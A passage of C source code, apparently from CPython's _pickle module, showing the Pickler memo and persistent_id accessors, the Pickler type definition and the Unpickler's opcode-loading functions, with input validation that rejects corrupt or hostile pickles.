memo_id = PyLong_AsSsize_t(PyTuple_GET_ITEM(value, 0));
if (memo_id == -1 && PyErr_Occurred())
goto error;
memo_obj = PyTuple_GET_ITEM(value, 1);
if (PyMemoTable_Set(new_memo, memo_obj, memo_id) < 0)
goto error;
}
}
else {
PyErr_Format(PyExc_TypeError,
"'memo' attribute must be a PicklerMemoProxy object"
"or dict, not %.200s", Py_TYPE(obj)->tp_name);
return -1;
}
PyMemoTable_Del(self->memo);
self->memo = new_memo;
return 0;
error:
if (new_memo)
PyMemoTable_Del(new_memo);
return -1;
}
static PyObject *
Pickler_get_persid(PicklerObject *self)
{
if (self->pers_func == NULL) {
PyErr_SetString(PyExc_AttributeError, "persistent_id");
return NULL;
}
return reconstruct_method(self->pers_func, self->pers_func_self);
}
static int
Pickler_set_persid(PicklerObject *self, PyObject *value)
{
if (value == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (!PyCallable_Check(value)) {
PyErr_SetString(PyExc_TypeError,
"persistent_id must be a callable taking one argument");
return -1;
}
self->pers_func_self = NULL;
Py_INCREF(value);
Py_XSETREF(self->pers_func, value);
return 0;
}
static PyMemberDef Pickler_members[] = {
{"bin", T_INT, offsetof(PicklerObject, bin)},
{"fast", T_INT, offsetof(PicklerObject, fast)},
{"dispatch_table", T_OBJECT_EX, offsetof(PicklerObject, dispatch_table)},
{NULL}
};
static PyGetSetDef Pickler_getsets[] = {
{"memo", (getter)Pickler_get_memo,
(setter)Pickler_set_memo},
{"persistent_id", (getter)Pickler_get_persid,
(setter)Pickler_set_persid},
{NULL}
};
static PyTypeObject Pickler_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Pickler" , /*tp_name*/
sizeof(PicklerObject), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)Pickler_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_reserved*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
_pickle_Pickler___init____doc__, /*tp_doc*/
(traverseproc)Pickler_traverse, /*tp_traverse*/
(inquiry)Pickler_clear, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
Pickler_methods, /*tp_methods*/
Pickler_members, /*tp_members*/
Pickler_getsets, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
_pickle_Pickler___init__, /*tp_init*/
PyType_GenericAlloc, /*tp_alloc*/
PyType_GenericNew, /*tp_new*/
PyObject_GC_Del, /*tp_free*/
0, /*tp_is_gc*/
};
/* Temporary helper for calling self.find_class().
XXX: It would be nice to able to avoid Python function call overhead, by
using directly the C version of find_class(), when find_class() is not
overridden by a subclass. Although, this could become rather hackish. A
simpler optimization would be to call the C function when self is not a
subclass instance. */
static PyObject *
find_class(UnpicklerObject *self, PyObject *module_name, PyObject *global_name)
{
_Py_IDENTIFIER(find_class);
return _PyObject_CallMethodIdObjArgs((PyObject *)self, &PyId_find_class,
module_name, global_name, NULL);
}
static Py_ssize_t
marker(UnpicklerObject *self)
{
Py_ssize_t mark;
if (self->num_marks < 1) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "could not find MARK");
return -1;
}
mark = self->marks[--self->num_marks];
self->stack->mark_set = self->num_marks != 0;
self->stack->fence = self->num_marks ?
self->marks[self->num_marks - 1] : 0;
return mark;
}
static int
load_none(UnpicklerObject *self)
{
PDATA_APPEND(self->stack, Py_None, -1);
return 0;
}
static int
load_int(UnpicklerObject *self)
{
PyObject *value;
char *endptr, *s;
Py_ssize_t len;
long x;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
errno = 0;
/* XXX: Should the base argument of strtol() be explicitly set to 10?
XXX(avassalotti): Should this uses PyOS_strtol()? */
x = strtol(s, &endptr, 0);
if (errno || (*endptr != '\n' && *endptr != '\0')) {
/* Hm, maybe we've got something long. Let's try reading
* it as a Python int object. */
errno = 0;
/* XXX: Same thing about the base here. */
value = PyLong_FromString(s, NULL, 0);
if (value == NULL) {
PyErr_SetString(PyExc_ValueError,
"could not convert string to int");
return -1;
}
}
else {
if (len == 3 && (x == 0 || x == 1)) {
if ((value = PyBool_FromLong(x)) == NULL)
return -1;
}
else {
if ((value = PyLong_FromLong(x)) == NULL)
return -1;
}
}
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_bool(UnpicklerObject *self, PyObject *boolean)
{
assert(boolean == Py_True || boolean == Py_False);
PDATA_APPEND(self->stack, boolean, -1);
return 0;
}
/* s contains x bytes of an unsigned little-endian integer. Return its value
* as a C Py_ssize_t, or -1 if it's higher than PY_SSIZE_T_MAX.
*/
static Py_ssize_t
calc_binsize(char *bytes, int nbytes)
{
unsigned char *s = (unsigned char *)bytes;
int i;
size_t x = 0;
if (nbytes > (int)sizeof(size_t)) {
/* Check for integer overflow. BINBYTES8 and BINUNICODE8 opcodes
* have 64-bit size that can't be represented on 32-bit platform.
*/
for (i = (int)sizeof(size_t); i < nbytes; i++) {
if (s[i])
return -1;
}
nbytes = (int)sizeof(size_t);
}
for (i = 0; i < nbytes; i++) {
x |= (size_t) s[i] << (8 * i);
}
if (x > PY_SSIZE_T_MAX)
return -1;
else
return (Py_ssize_t) x;
}
/* s contains x bytes of a little-endian integer. Return its value as a
* C int. Obscure: when x is 1 or 2, this is an unsigned little-endian
* int, but when x is 4 it's a signed one. This is a historical source
* of x-platform bugs.
*/
static long
calc_binint(char *bytes, int nbytes)
{
unsigned char *s = (unsigned char *)bytes;
Py_ssize_t i;
long x = 0;
for (i = 0; i < nbytes; i++) {
x |= (long)s[i] << (8 * i);
}
/* Unlike BININT1 and BININT2, BININT (more accurately BININT4)
* is signed, so on a box with longs bigger than 4 bytes we need
* to extend a BININT's sign bit to the full width.
*/
if (SIZEOF_LONG > 4 && nbytes == 4) {
x |= -(x & (1L << 31));
}
return x;
}
static int
load_binintx(UnpicklerObject *self, char *s, int size)
{
PyObject *value;
long x;
x = calc_binint(s, size);
if ((value = PyLong_FromLong(x)) == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_binint(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
return load_binintx(self, s, 4);
}
static int
load_binint1(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
return load_binintx(self, s, 1);
}
static int
load_binint2(UnpicklerObject *self)
{
char *s;
if (_Unpickler_Read(self, &s, 2) < 0)
return -1;
return load_binintx(self, s, 2);
}
static int
load_long(UnpicklerObject *self)
{
PyObject *value;
char *s = NULL;
Py_ssize_t len;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
/* s[len-2] will usually be 'L' (and s[len-1] is '\n'); we need to remove
the 'L' before calling PyLong_FromString. In order to maintain
compatibility with Python 3.0.0, we don't actually *require*
the 'L' to be present. */
if (s[len-2] == 'L')
s[len-2] = '\0';
/* XXX: Should the base argument explicitly set to 10? */
value = PyLong_FromString(s, NULL, 0);
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
/* 'size' bytes contain the # of bytes of little-endian 256's-complement
* data following.
*/
static int
load_counted_long(UnpicklerObject *self, int size)
{
PyObject *value;
char *nbytes;
char *pdata;
assert(size == 1 || size == 4);
if (_Unpickler_Read(self, &nbytes, size) < 0)
return -1;
size = calc_binint(nbytes, size);
if (size < 0) {
PickleState *st = _Pickle_GetGlobalState();
/* Corrupt or hostile pickle -- we never write one like this */
PyErr_SetString(st->UnpicklingError,
"LONG pickle has negative byte count");
return -1;
}
if (size == 0)
value = PyLong_FromLong(0L);
else {
/* Read the raw little-endian bytes and convert. */
if (_Unpickler_Read(self, &pdata, size) < 0)
return -1;
value = _PyLong_FromByteArray((unsigned char *)pdata, (size_t)size,
1 /* little endian */ , 1 /* signed */ );
}
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_float(UnpicklerObject *self)
{
PyObject *value;
char *endptr, *s;
Py_ssize_t len;
double d;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
errno = 0;
d = PyOS_string_to_double(s, &endptr, PyExc_OverflowError);
if (d == -1.0 && PyErr_Occurred())
return -1;
if ((endptr[0] != '\n') && (endptr[0] != '\0')) {
PyErr_SetString(PyExc_ValueError, "could not convert string to float");
return -1;
}
value = PyFloat_FromDouble(d);
if (value == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_binfloat(UnpicklerObject *self)
{
PyObject *value;
double x;
char *s;
if (_Unpickler_Read(self, &s, 8) < 0)
return -1;
x = _PyFloat_Unpack8((unsigned char *)s, 0);
if (x == -1.0 && PyErr_Occurred())
return -1;
if ((value = PyFloat_FromDouble(x)) == NULL)
return -1;
PDATA_PUSH(self->stack, value, -1);
return 0;
}
static int
load_string(UnpicklerObject *self)
{
PyObject *bytes;
PyObject *obj;
Py_ssize_t len;
char *s, *p;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
/* Strip the newline */
len--;
/* Strip outermost quotes */
if (len >= 2 && s[0] == s[len - 1] && (s[0] == '\'' || s[0] == '"')) {
p = s + 1;
len -= 2;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"the STRING opcode argument must be quoted");
return -1;
}
assert(len >= 0);
/* Use the PyBytes API to decode the string, since that is what is used
to encode, and then coerce the result to Unicode. */
bytes = PyBytes_DecodeEscape(p, len, NULL, 0, NULL);
if (bytes == NULL)
return -1;
/* Leave the Python 2.x strings as bytes if the *encoding* given to the
Unpickler was 'bytes'. Otherwise, convert them to unicode. */
if (strcmp(self->encoding, "bytes") == 0) {
obj = bytes;
}
else {
obj = PyUnicode_FromEncodedObject(bytes, self->encoding, self->errors);
Py_DECREF(bytes);
if (obj == NULL) {
return -1;
}
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_counted_binstring(UnpicklerObject *self, int nbytes)
{
PyObject *obj;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->UnpicklingError,
"BINSTRING exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
/* Convert Python 2.x strings to bytes if the *encoding* given to the
Unpickler was 'bytes'. Otherwise, convert them to unicode. */
if (strcmp(self->encoding, "bytes") == 0) {
obj = PyBytes_FromStringAndSize(s, size);
}
else {
obj = PyUnicode_Decode(s, size, self->encoding, self->errors);
}
if (obj == NULL) {
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_counted_binbytes(UnpicklerObject *self, int nbytes)
{
PyObject *bytes;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PyErr_Format(PyExc_OverflowError,
"BINBYTES exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
bytes = PyBytes_FromStringAndSize(s, size);
if (bytes == NULL)
return -1;
PDATA_PUSH(self->stack, bytes, -1);
return 0;
}
static int
load_unicode(UnpicklerObject *self)
{
PyObject *str;
Py_ssize_t len;
char *s = NULL;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 1)
return bad_readline();
str = PyUnicode_DecodeRawUnicodeEscape(s, len - 1, NULL);
if (str == NULL)
return -1;
PDATA_PUSH(self->stack, str, -1);
return 0;
}
static int
load_counted_binunicode(UnpicklerObject *self, int nbytes)
{
PyObject *str;
Py_ssize_t size;
char *s;
if (_Unpickler_Read(self, &s, nbytes) < 0)
return -1;
size = calc_binsize(s, nbytes);
if (size < 0) {
PyErr_Format(PyExc_OverflowError,
"BINUNICODE exceeds system's maximum size of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, size) < 0)
return -1;
str = PyUnicode_DecodeUTF8(s, size, "surrogatepass");
if (str == NULL)
return -1;
PDATA_PUSH(self->stack, str, -1);
return 0;
}
static int
load_counted_tuple(UnpicklerObject *self, Py_ssize_t len)
{
PyObject *tuple;
if (Py_SIZE(self->stack) < len)
return Pdata_stack_underflow(self->stack);
tuple = Pdata_poptuple(self->stack, Py_SIZE(self->stack) - len);
if (tuple == NULL)
return -1;
PDATA_PUSH(self->stack, tuple, -1);
return 0;
}
static int
load_tuple(UnpicklerObject *self)
{
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
return load_counted_tuple(self, Py_SIZE(self->stack) - i);
}
static int
load_empty_list(UnpicklerObject *self)
{
PyObject *list;
if ((list = PyList_New(0)) == NULL)
return -1;
PDATA_PUSH(self->stack, list, -1);
return 0;
}
static int
load_empty_dict(UnpicklerObject *self)
{
PyObject *dict;
if ((dict = PyDict_New()) == NULL)
return -1;
PDATA_PUSH(self->stack, dict, -1);
return 0;
}
static int
load_empty_set(UnpicklerObject *self)
{
PyObject *set;
if ((set = PySet_New(NULL)) == NULL)
return -1;
PDATA_PUSH(self->stack, set, -1);
return 0;
}
static int
load_list(UnpicklerObject *self)
{
PyObject *list;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
list = Pdata_poplist(self->stack, i);
if (list == NULL)
return -1;
PDATA_PUSH(self->stack, list, -1);
return 0;
}
static int
load_dict(UnpicklerObject *self)
{
PyObject *dict, *key, *value;
Py_ssize_t i, j, k;
if ((i = marker(self)) < 0)
return -1;
j = Py_SIZE(self->stack);
if ((dict = PyDict_New()) == NULL)
return -1;
if ((j - i) % 2 != 0) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "odd number of items for DICT");
Py_DECREF(dict);
return -1;
}
for (k = i + 1; k < j; k += 2) {
key = self->stack->data[k - 1];
value = self->stack->data[k];
if (PyDict_SetItem(dict, key, value) < 0) {
Py_DECREF(dict);
return -1;
}
}
Pdata_clear(self->stack, i);
PDATA_PUSH(self->stack, dict, -1);
return 0;
}
static int
load_frozenset(UnpicklerObject *self)
{
PyObject *items;
PyObject *frozenset;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
items = Pdata_poptuple(self->stack, i);
if (items == NULL)
return -1;
frozenset = PyFrozenSet_New(items);
Py_DECREF(items);
if (frozenset == NULL)
return -1;
PDATA_PUSH(self->stack, frozenset, -1);
return 0;
}
static PyObject *
instantiate(PyObject *cls, PyObject *args)
{
/* Caller must assure args are a tuple. Normally, args come from
Pdata_poptuple which packs objects from the top of the stack
into a newly created tuple. */
assert(PyTuple_Check(args));
if (!PyTuple_GET_SIZE(args) && PyType_Check(cls)) {
_Py_IDENTIFIER(__getinitargs__);
_Py_IDENTIFIER(__new__);
PyObject *func;
if (_PyObject_LookupAttrId(cls, &PyId___getinitargs__, &func) < 0) {
return NULL;
}
if (func == NULL) {
return _PyObject_CallMethodIdObjArgs(cls, &PyId___new__, cls, NULL);
}
Py_DECREF(func);
}
return PyObject_CallObject(cls, args);
}
static int
load_obj(UnpicklerObject *self)
{
PyObject *cls, *args, *obj = NULL;
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
if (Py_SIZE(self->stack) - i < 1)
return Pdata_stack_underflow(self->stack);
args = Pdata_poptuple(self->stack, i + 1);
if (args == NULL)
return -1;
PDATA_POP(self->stack, cls);
if (cls) {
obj = instantiate(cls, args);
Py_DECREF(cls);
}
Py_DECREF(args);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_inst(UnpicklerObject *self)
{
PyObject *cls = NULL;
PyObject *args = NULL;
PyObject *obj = NULL;
PyObject *module_name;
PyObject *class_name;
Py_ssize_t len;
Py_ssize_t i;
char *s;
if ((i = marker(self)) < 0)
return -1;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
/* Here it is safe to use PyUnicode_DecodeASCII(), even though non-ASCII
identifiers are permitted in Python 3.0, since the INST opcode is only
supported by older protocols on Python 2.x. */
module_name = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (module_name == NULL)
return -1;
if ((len = _Unpickler_Readline(self, &s)) >= 0) {
if (len < 2) {
Py_DECREF(module_name);
return bad_readline();
}
class_name = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (class_name != NULL) {
cls = find_class(self, module_name, class_name);
Py_DECREF(class_name);
}
}
Py_DECREF(module_name);
if (cls == NULL)
return -1;
if ((args = Pdata_poptuple(self->stack, i)) != NULL) {
obj = instantiate(cls, args);
Py_DECREF(args);
}
Py_DECREF(cls);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_newobj(UnpicklerObject *self)
{
PyObject *args = NULL;
PyObject *clsraw = NULL;
PyTypeObject *cls; /* clsraw cast to its true type */
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
/* Stack is ... cls argtuple, and we want to call
* cls.__new__(cls, *argtuple).
*/
PDATA_POP(self->stack, args);
if (args == NULL)
goto error;
if (!PyTuple_Check(args)) {
PyErr_SetString(st->UnpicklingError,
"NEWOBJ expected an arg " "tuple.");
goto error;
}
PDATA_POP(self->stack, clsraw);
cls = (PyTypeObject *)clsraw;
if (cls == NULL)
goto error;
if (!PyType_Check(cls)) {
PyErr_SetString(st->UnpicklingError, "NEWOBJ class argument "
"isn't a type object");
goto error;
}
if (cls->tp_new == NULL) {
PyErr_SetString(st->UnpicklingError, "NEWOBJ class argument "
"has NULL tp_new");
goto error;
}
/* Call __new__. */
obj = cls->tp_new(cls, args, NULL);
if (obj == NULL)
goto error;
Py_DECREF(args);
Py_DECREF(clsraw);
PDATA_PUSH(self->stack, obj, -1);
return 0;
error:
Py_XDECREF(args);
Py_XDECREF(clsraw);
return -1;
}
static int
load_newobj_ex(UnpicklerObject *self)
{
PyObject *cls, *args, *kwargs;
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
PDATA_POP(self->stack, kwargs);
if (kwargs == NULL) {
return -1;
}
PDATA_POP(self->stack, args);
if (args == NULL) {
Py_DECREF(kwargs);
return -1;
}
PDATA_POP(self->stack, cls);
if (cls == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
return -1;
}
if (!PyType_Check(cls)) {
Py_DECREF(kwargs);
Py_DECREF(args);
PyErr_Format(st->UnpicklingError,
"NEWOBJ_EX class argument must be a type, not %.200s",
Py_TYPE(cls)->tp_name);
Py_DECREF(cls);
return -1;
}
if (((PyTypeObject *)cls)->tp_new == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
Py_DECREF(cls);
PyErr_SetString(st->UnpicklingError,
"NEWOBJ_EX class argument doesn't have __new__");
return -1;
}
obj = ((PyTypeObject *)cls)->tp_new((PyTypeObject *)cls, args, kwargs);
Py_DECREF(kwargs);
Py_DECREF(args);
Py_DECREF(cls);
if (obj == NULL) {
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_global(UnpicklerObject *self)
{
PyObject *global = NULL;
PyObject *module_name;
PyObject *global_name;
Py_ssize_t len;
char *s;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
module_name = PyUnicode_DecodeUTF8(s, len - 1, "strict");
if (!module_name)
return -1;
if ((len = _Unpickler_Readline(self, &s)) >= 0) {
if (len < 2) {
Py_DECREF(module_name);
return bad_readline();
}
global_name = PyUnicode_DecodeUTF8(s, len - 1, "strict");
if (global_name) {
global = find_class(self, module_name, global_name);
Py_DECREF(global_name);
}
}
Py_DECREF(module_name);
if (global == NULL)
return -1;
PDATA_PUSH(self->stack, global, -1);
return 0;
}
static int
load_stack_global(UnpicklerObject *self)
{
PyObject *global;
PyObject *module_name;
PyObject *global_name;
PDATA_POP(self->stack, global_name);
PDATA_POP(self->stack, module_name);
if (module_name == NULL || !PyUnicode_CheckExact(module_name) ||
global_name == NULL || !PyUnicode_CheckExact(global_name)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "STACK_GLOBAL requires str");
Py_XDECREF(global_name);
Py_XDECREF(module_name);
return -1;
}
global = find_class(self, module_name, global_name);
Py_DECREF(global_name);
Py_DECREF(module_name);
if (global == NULL)
return -1;
PDATA_PUSH(self->stack, global, -1);
return 0;
}
static int
load_persid(UnpicklerObject *self)
{
PyObject *pid, *obj;
Py_ssize_t len;
char *s;
if (self->pers_func) {
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 1)
return bad_readline();
pid = PyUnicode_DecodeASCII(s, len - 1, "strict");
if (pid == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeDecodeError)) {
PyErr_SetString(_Pickle_GetGlobalState()->UnpicklingError,
"persistent IDs in protocol 0 must be "
"ASCII strings");
}
return -1;
}
obj = call_method(self->pers_func, self->pers_func_self, pid);
Py_DECREF(pid);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"A load persistent id instruction was encountered,\n"
"but no persistent_load function was specified.");
return -1;
}
}
static int
load_binpersid(UnpicklerObject *self)
{
PyObject *pid, *obj;
if (self->pers_func) {
PDATA_POP(self->stack, pid);
if (pid == NULL)
return -1;
obj = call_method(self->pers_func, self->pers_func_self, pid);
Py_DECREF(pid);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"A load persistent id instruction was encountered,\n"
"but no persistent_load function was specified.");
return -1;
}
}
static int
load_pop(UnpicklerObject *self)
{
Py_ssize_t len = Py_SIZE(self->stack);
/* Note that we split the (pickle.py) stack into two stacks,
* an object stack and a mark stack. We have to be clever and
* pop the right one. We do this by looking at the top of the
* mark stack first, and only signalling a stack underflow if
* the object stack is empty and the mark stack doesn't match
* our expectations.
*/
if (self->num_marks > 0 && self->marks[self->num_marks - 1] == len) {
self->num_marks--;
self->stack->mark_set = self->num_marks != 0;
self->stack->fence = self->num_marks ?
self->marks[self->num_marks - 1] : 0;
} else if (len <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
else {
len--;
Py_DECREF(self->stack->data[len]);
Py_SIZE(self->stack) = len;
}
return 0;
}
static int
load_pop_mark(UnpicklerObject *self)
{
Py_ssize_t i;
if ((i = marker(self)) < 0)
return -1;
Pdata_clear(self->stack, i);
return 0;
}
static int
load_dup(UnpicklerObject *self)
{
PyObject *last;
Py_ssize_t len = Py_SIZE(self->stack);
if (len <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
last = self->stack->data[len - 1];
PDATA_APPEND(self->stack, last, -1);
return 0;
}
static int
load_get(UnpicklerObject *self)
{
PyObject *key, *value;
Py_ssize_t idx;
Py_ssize_t len;
char *s;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
key = PyLong_FromString(s, NULL, 10);
if (key == NULL)
return -1;
idx = PyLong_AsSsize_t(key);
if (idx == -1 && PyErr_Occurred()) {
Py_DECREF(key);
return -1;
}
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
if (!PyErr_Occurred())
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
return -1;
}
Py_DECREF(key);
PDATA_APPEND(self->stack, value, -1);
return 0;
}
static int
load_binget(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
idx = Py_CHARMASK(s[0]);
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
PyObject *key = PyLong_FromSsize_t(idx);
if (key != NULL) {
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
}
return -1;
}
PDATA_APPEND(self->stack, value, -1);
return 0;
}
static int
load_long_binget(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
idx = calc_binsize(s, 4);
value = _Unpickler_MemoGet(self, idx);
if (value == NULL) {
PyObject *key = PyLong_FromSsize_t(idx);
if (key != NULL) {
PyErr_SetObject(PyExc_KeyError, key);
Py_DECREF(key);
}
return -1;
}
PDATA_APPEND(self->stack, value, -1);
return 0;
}
/* Push an object from the extension registry (EXT[124]). nbytes is
* the number of bytes following the opcode, holding the index (code) value.
*/
static int
load_extension(UnpicklerObject *self, int nbytes)
{
char *codebytes; /* the nbytes bytes after the opcode */
long code; /* calc_binint returns long */
PyObject *py_code; /* code as a Python int */
PyObject *obj; /* the object to push */
PyObject *pair; /* (module_name, class_name) */
PyObject *module_name, *class_name;
PickleState *st = _Pickle_GetGlobalState();
assert(nbytes == 1 || nbytes == 2 || nbytes == 4);
if (_Unpickler_Read(self, &codebytes, nbytes) < 0)
return -1;
code = calc_binint(codebytes, nbytes);
if (code <= 0) { /* note that 0 is forbidden */
/* Corrupt or hostile pickle. */
PyErr_SetString(st->UnpicklingError, "EXT specifies code <= 0");
return -1;
}
/* Look for the code in the cache. */
py_code = PyLong_FromLong(code);
if (py_code == NULL)
return -1;
obj = PyDict_GetItemWithError(st->extension_cache, py_code);
if (obj != NULL) {
/* Bingo. */
Py_DECREF(py_code);
PDATA_APPEND(self->stack, obj, -1);
return 0;
}
if (PyErr_Occurred()) {
Py_DECREF(py_code);
return -1;
}
/* Look up the (module_name, class_name) pair. */
pair = PyDict_GetItemWithError(st->inverted_registry, py_code);
if (pair == NULL) {
Py_DECREF(py_code);
if (!PyErr_Occurred()) {
PyErr_Format(PyExc_ValueError, "unregistered extension "
"code %ld", code);
}
return -1;
}
/* Since the extension registry is manipulable via Python code,
* confirm that pair is really a 2-tuple of strings.
*/
if (!PyTuple_Check(pair) || PyTuple_Size(pair) != 2 ||
!PyUnicode_Check(module_name = PyTuple_GET_ITEM(pair, 0)) ||
!PyUnicode_Check(class_name = PyTuple_GET_ITEM(pair, 1))) {
Py_DECREF(py_code);
PyErr_Format(PyExc_ValueError, "_inverted_registry[%ld] "
"isn't a 2-tuple of strings", code);
return -1;
}
/* Load the object. */
obj = find_class(self, module_name, class_name);
if (obj == NULL) {
Py_DECREF(py_code);
return -1;
}
/* Cache code -> obj. */
code = PyDict_SetItem(st->extension_cache, py_code, obj);
Py_DECREF(py_code);
if (code < 0) {
Py_DECREF(obj);
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_put(UnpicklerObject *self)
{
PyObject *key, *value;
Py_ssize_t idx;
Py_ssize_t len;
char *s = NULL;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
key = PyLong_FromString(s, NULL, 10);
if (key == NULL)
return -1;
idx = PyLong_AsSsize_t(key);
Py_DECREF(key);
if (idx < 0) {
if (!PyErr_Occurred())
PyErr_SetString(PyExc_ValueError,
"negative PUT argument");
return -1;
}
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_binput(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
idx = Py_CHARMASK(s[0]);
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_long_binput(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
idx = calc_binsize(s, 4);
if (idx < 0) {
PyErr_SetString(PyExc_ValueError,
"negative LONG_BINPUT argument");
return -1;
}
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_memoize(UnpicklerObject *self)
{
PyObject *value;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
return _Unpickler_MemoPut(self, self->memo_len, value);
}
static int
do_append(UnpicklerObject *self, Py_ssize_t x)
{
PyObject *value;
PyObject *slice;
PyObject *list;
PyObject *result;
Py_ssize_t len, i;
len = Py_SIZE(self->stack);
if (x > len || x <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == x) /* nothing to do */
return 0;
list = self->stack->data[x - 1];
if (PyList_CheckExact(list)) {
Py_ssize_t list_len;
int ret;
slice = Pdata_poplist(self->stack, x);
if (!slice)
return -1;
list_len = PyList_GET_SIZE(list);
ret = PyList_SetSlice(list, list_len, list_len, slice);
Py_DECREF(slice);
return ret;
}
else {
PyObject *extend_func;
_Py_IDENTIFIER(extend);
extend_func = _PyObject_GetAttrId(list, &PyId_extend);
if (extend_func != NULL) {
